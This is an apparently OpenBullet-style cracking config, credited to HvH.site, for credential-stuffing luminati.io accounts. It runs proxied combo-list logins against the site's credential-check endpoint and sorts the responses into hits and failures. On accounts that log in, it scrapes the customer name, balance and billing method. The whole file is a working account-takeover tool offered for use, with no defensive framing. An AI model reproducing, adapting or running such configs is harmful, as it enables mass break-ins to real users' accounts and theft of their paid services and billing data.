[SETTINGS]
{
  "Name": "luminati.io ",
  "SuggestedBots": 25,
  "MaxCPM": 0,
  "LastModified": "2019-07-07T21:55:33.6940739+01:00",
  "AdditionalInfo": "",
  "Author": "HvH.site",
  "Version": "1.3.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#HvH.site REQUEST GET "https://luminati.io" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#HvH.site PARSE "<COOKIES(XSRF-TOKEN)>" LR "" "" -> VAR "xsrf" 

#HvH.site REQUEST POST "https://luminati.io/users/auth/basic/check_credentials" 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: text/plain, */*; q=0.01" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-GB,en-US;q=0.9,en;q=0.8" 
  HEADER "cache-control: no-cache" 
  HEADER "content-length: 44" 
  HEADER "content-type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "origin: https://luminati.io" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://luminati.io/" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 
  HEADER "x-requested-with: XMLHttpRequest" 

#HvH.site PARSE "<COOKIES(connect.sid)>" LR "" "" -> VAR "sid" 

#HvH.site KEYCHECK 
  KEYCHAIN Success OR 
    KEY "ok" 
  KEYCHAIN Failure OR 
    KEY "not_registered" 
    KEY "unauthorized" 
    KEY "The email address is not registered. If you signed up with Google signup button, you should login with Google login button." 

#HvH.site REQUEST GET "https://luminati.io/users/get_customers_list?product=lum" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#HvH.site PARSE "<SOURCE>" LR "customer_name\":\"" "\"," -> CAP "Username" 

#HvH.site REQUEST GET "https://luminati.io/users/customer_info?customer=<Username>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#HvH.site PARSE "<SOURCE>" LR "\",\"balance\":" ",\"payment" -> CAP "Balance" 

#HvH.site PARSE "<SOURCE>" LR "billing_method\":\"" "\",\"" -> CAP "Billing method" "" " | HvH.site" 

